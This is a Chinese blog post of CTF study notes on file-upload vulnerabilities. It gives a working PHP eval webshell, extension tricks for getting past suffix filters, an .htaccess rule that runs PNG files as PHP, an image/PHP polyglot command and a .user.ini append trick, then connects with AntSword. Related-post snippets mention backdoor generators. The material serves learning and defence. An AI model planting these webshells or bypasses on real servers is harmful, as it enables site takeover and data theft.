文件上传(antsword获取flag)

已于 2023-05-02 19:36:03 修改
阅读量649 收藏 1
点赞数
文章标签: 安全
于 2023-05-02 17:02:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62886641/article/details/130463954
版权
文章讲述了非法用户如何利用上传的恶意文件(如WebShell)来控制网站,讨论了BurpSuite在检测中的作用。提到了多种绕过服务器防护的手段,包括文件后缀变化、.htaccess配置修改、图片码和.user.ini文件的利用。同时,文章提供了一个实例分析,展示了攻击者可能的操作流程及防御工具如Antsword的使用。
摘要由CSDN通过智能技术生成

非法用户可以利用上传的恶意文件控制整个网站,这个恶意文件被称为WebShell,也可以称为一种网页后门。

用burpsuite里面的浏览器

1:

一句话木马webshell.php:<?php eval ($_POST['data']);?>

2:

文件后缀绕过:如果.php后缀被限制,可以尝试这些后缀(webshell内容一样):.phtml、.pht、.php3、.php4、.php5、.pHp(修改大小写)

<script language="php"> eval ($_POST['data']);</script>

若上述后缀都被限制,可以试试.htaccess

<FilesMatch "png">

setHandler application/x-httpd-php

</FilesMatch>

3.

图片码绕过:

.htaccess不允许上传,图片马可以上传,但是还不能运行。

cmd:copy /b 图片名.png+一句话木马.php 生成新文件名.png

实例分析:

上传成功后,找图片的位置:<div class="content-center"> 

接下来就考虑,改文件名,内容类型,内容

把获取的文件重新上传

出现乱码则使用antsword 去连接,找出flag

4.

.user.ini绕过

hello.php:<?php echo "hello";?>

.user.ini:auto_append_file=hello.png

hello.png:<?php echo"hacker!"; ?>

5.

客户端拦截

将filename修改为shell2.php,删掉图片对应的内容,右键选择Paste from file,选择shell.php

 

 

 

HfLllo
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
文件上传漏洞
m0_61506558的博客
08-06 673
1.1PHP代码文件上传
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
杨秀璋的专栏
04-10 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。由于hack the box速度堪忧,作者选择了Vulnhub靶场,希望深入分析来
文件上传】01ctfer 文件上传获取flag
wj33333的博客
11-16 581
01ctfer 文件上传获取flag
weevely生成木马文件上传获取靶机中的flag文件
qq_55961856的博客
06-02 2247
在靶机里创建了一个flag.txt,通过生成木马文件上传获取靶机中的flag.txt 攻击机kali:192.168.182.133 靶机metasploit:192.168.182.128 ping一下看看靶机是否存活 输入weevely generate 123456 /root/muma.php生成一个密码为123456的木马文件存放在root下 cat看一下生成的木马文件 个人觉得这种绕过的强度应该够用 进入靶机dvwa,将等级调至low 然后进入靶机cat查看一下 成功上传到靶机
upload-labs-03
m0_51998814的博客
04-02 3844
一、前言 本关涉及的是黑名单的绕过。 我们先来看看什么是黑名单。 黑名单:明确不让上传的文件后缀名,例如:jsp、asp、php、html 二、环境 靶场:upload-labs 工具:burpsuit 三、思路 老规矩,上传一个包含一句话木马的php文件测试。 //一句话木马 <?php phpinfo();?> 出现报错提示,看提示应该是一个黑名单,查看源码。 打开源码,我们可以看到有一个黑名单,里面设置了不允许上传的文件名。 但是他的名单不完整,所以我们可以用
CTFshow | 文件上传
m0_60651303的博客
08-04 787
var/log/nginx/ 目录是 NGINX 的默认日志位置,可以从中到一个 access.log 文件和 error.log 文件,include函数包含日志查看日志内容。2、看一下upload文件下有index.php,说明可以通过.user.ini文件来上传文件上传漏洞是指用户上传了一个可执行的脚本文件,而且通过这个脚本文件获得了执行服务端命令的能力。1、几经尝试,发现php不能通过,phP可以通过,说明过滤掉了php。过滤了php,system,{},和分号,直接执行命令
文件上传漏洞--新收获
CNXBDSa的博客
05-26 734
Apache的.htaccess利用技巧 转载于:https://xz.aliyun.com/t/8267#toc-6 前言:文件上传绕过可以通过上传.htaccess进行绕过,之前一直未解什么原理,今天逛先知社区狠狠的学了一吧! .htaccess 可以实现网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。 常用指令 AddType AddType 可以将给定的文件扩展名映射到指定的内容类型 用法: AddType medi
文件上传相关题目
m0_73952121的博客
10-21 1072
简单的文件上传题目
中国蚁剑AntSword
最新发布
04-07
文件管理功能则允许用户浏览、下载、上传服务器文件,便于在测试过程中获取和分析目标系统的文件信息。 端口扫描功能是AntSword的另一个亮点。通过扫描目标主机的开放端口,可以发现可能存在的服务漏洞,这对于网络...
渗透测试 2 --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3160
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
攻防世界 WEB 新手练习区 writeup 007-012
ChaoYue_miku的博客
09-02 1353
007 simple_php 难度系数:1.0 题目来源: Cyberpeace-n3k0 题目描述: 小宁听说php是最好的语言,于是她简单学习之后写了几行php代码。 0x01 打开网页 有一段PHP源代码 0x02 进行代码审计 <?php show_source(__FILE__); include("config.php"); $a=@$_GET['a']; $b=@$_GET['b']; if($a==0 and $a){ echo $flag1; } if(is_numer
新方法突破上传限制
weixin_30929195的博客
07-02 289
下午,朋友丢来一个后台,说搞不定,要拿个SHELL。 偶进去翻了一下,没发现太多利用的地方,就一个添加文章和上传图片的地方。 添加文章直接生成一个ASPX文件,但不知道哪些东西可以写进去,没源码,随便试了下,插了几个代码都没成功,估计不是有过滤就是直接写进库了,于是放弃这条路。 来看看上传上传一个正常的图片可以直接上传,ASP马无论改名与否都直接报错。 看来是检查是不是图片了,这...
文件上传漏洞(全网最详细)
热门推荐
qq_61553520的博客
04-19 1万+
自从学完文件上传后,寻思总结一下,但一直懒惰向后推迟,最近要准备面试了,就趁此机会写一下。文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。“文件上传” 本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。这种攻击方式是最为直接和有效的,所以我们需要思考的是如何绕过检测和过滤。
【CTFHub】文件上传
m0_63563528的博客
01-23 860
【CTFHub】web-文件上传
文件上传漏洞例题
agoodboy6的博客
12-02 797
进入环境上传文件(要新建一个php格式的一句话木马)直接上传即可利用蚁剑(中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。简单来说是一款webshell管理工具,当然也有很多类似的工具)连接成功即可获取flag
文件上传的漏洞介绍及常见防御方法V1.0
qq_49849300的博客
02-16 3112
if (file==null||file==""){ alert("请选择要上传的文件");
网络渗透CTF实践:获取靶机Web Developer 文件/root/flag.txt中flag
yellowO的博客
12-27 4714
实验目的:通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。(Dirb 是一个专门用于爆破目录的工具,在 Kali 中默认已经安装,类似工具还有国外的patator,dirsearch,DirBuster, 国内的御剑)截图。利用该插件可能存在的漏洞。pwd查看当前所在的目录,cd切换到/var/www/html目录下,ls查看当前目录下的内容,到wp-config.php文件。
自动获取flag
zheng_ruiguo的专栏
04-23 3052
''' scnaFlag.py 自动获取flag by 郑瑞国 ''' import paramiko import webbrowser from ftplib import FTP import threading import time def webConnect(ip): webbrowser.open('http://'+ip+'/twiki/readme.txt') ...
txt文件读取(已解决中文乱码)
msk498020309的博客
07-31 9540
昨天读取txt文档的时候始终出现中文乱码,去好多网站看了,都TMD一坑,根本没有解决问题嘛!大多数博客上写的的格式就是一样的不晓得哪个超哪个,最后终于在http://blog.csdn.net/maxracer/article/details/5436580上到解决办法,进行一些改进后,得到可行的方法 1.Read.java [code="java"] import java.io.B...
trackhacker 100 下载文件进行分析。flag形式flag{}。
07-10
### 回答1: 要分析 trackhacker 100 下载的文件,首先需要了解一下这个文件的特点和格式。 以文件的格式来说,可能是各种类型的文件,比如文本文件、图像文件、视频文件等等。因此,在分析之前需要确定文件的类型以及相应的分析工具。 对于文本文件,可以使用文本编辑器或者命令行工具来打开并查看文件内容。在这个过程中,可以搜索关键字、查特定字符串、识别文件中隐藏的信息等等。 对于图像文件,可以使用图像处理软件来打开并观察图像。在这个过程中,可以检查图像的元数据、分析图像的像素值等,以查是否有隐藏的信息。 对于视频文件,可以使用视频播放软件来观看视频。在这个过程中,可以观察视频内容,注意是否有隐藏的信息或特定标记出现在视频中。 无论是什么类型的文件,还可以利用一些分析工具来进一步深入研究。比如,可以使用反汇编工具来分析二进制文件,逆向工程来还原源代码或特定功能,网络流量分析工具来研究网络数据包等等。 根据题目中提到的 flag 格式 "flag{}",在分析过程中可以尝试搜索这个格式,看是否能到相关的信息。 总之,分析 trackhacker 100 下载的文件需要根据具体的文件类型选择合适的工具,并配合使用不同的技术手段来深入研究文件内容,以到所需的 flag。 ### 回答2: trackhacker 100 是一个用于下载文件进行分析的工具。在使用该工具之前,我们需要确保我们已经获得了相应的权限,并且已经取得了合法的授权。 首先,我们需要在合适的环境中安装 trackhacker 100。可以通过下载该工具的安装程序,然后按照提示进行安装。安装完成后,我们就可以开始使用该工具进行文件下载和分析了。 使用 trackhacker 100 进行文件下载很简单。我们首先需要确定我们想要下载的文件的 URL 或者目标的 IP 地址。然后,我们可以使用该工具提供的命令行界面或者图形界面来指定下载的文件或者目标,并且设置保存文件的路径。 一旦我们开始了下载任务,trackhacker 100 将会开始从目标服务器下载文件。下载过程中,该工具会监控和记录相关的网络流量和数据包,并且提供一些分析和报告功能。我们可以根据需要查看下载进度、文件大小、下载速度等信息。 下载完成后,我们可以使用其他工具或者手动分析下载的文件。我们可以检查文件的完整性、查看文件的内容、分析文件的结构等。 总结一下,trackhacker 100 是一个用于下载文件进行分析的工具,它可以帮助我们快速有效地从目标服务器下载文件,并且提供一些分析和报告功能,帮助我们深入了解所下载的文件。 ### 回答3: trackhacker 100 是一个文件下载挑战,我们需要对下载的文件进行分析以获取 flag。首先,我们需要使用合适的工具下载文件。我们可以使用命令行工具如wget或curl,或者使用网页浏览器来下载文件。 下载文件后,我们需要查看文件的内容并进行文件分析。常见的文件类型包括文本文件、图像文件、压缩文件等。 对于文本文件,我们可以使用文本编辑器打开并查看文件的内容。我们需要仔细检查文件中是否包含 flag ,flag 的格式可能是 flag{} 加上一串字符。 如果下载的是图像文件,我们需要使用图像编辑软件打开文件,并仔细检查图像的各个部分。有时 flag 可能被隐藏在图像的像素值或特定的位置上。 对于压缩文件,我们需要解压缩以获取其中的内容。解压缩软件如WinRAR、7-Zip等可以帮助我们进行解压缩操作。解压缩后,我们需要查看文件的内容,类似于文本文件的分析方式。 在进行文件分析时,我们还可以使用一些辅助工具,如命令行工具grep、strings等,来搜索文件中的特定字符或字符串。 总之,对于 trackhacker 100 的文件下载挑战,我们需要下载文件后仔细查看文件的内容,并进行逐行或逐像素的分析,以到 flag 的位置和格式。通过合理利用文件编辑器、解压缩软件以及辅助工具,我们可以较好地完成这个挑战。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值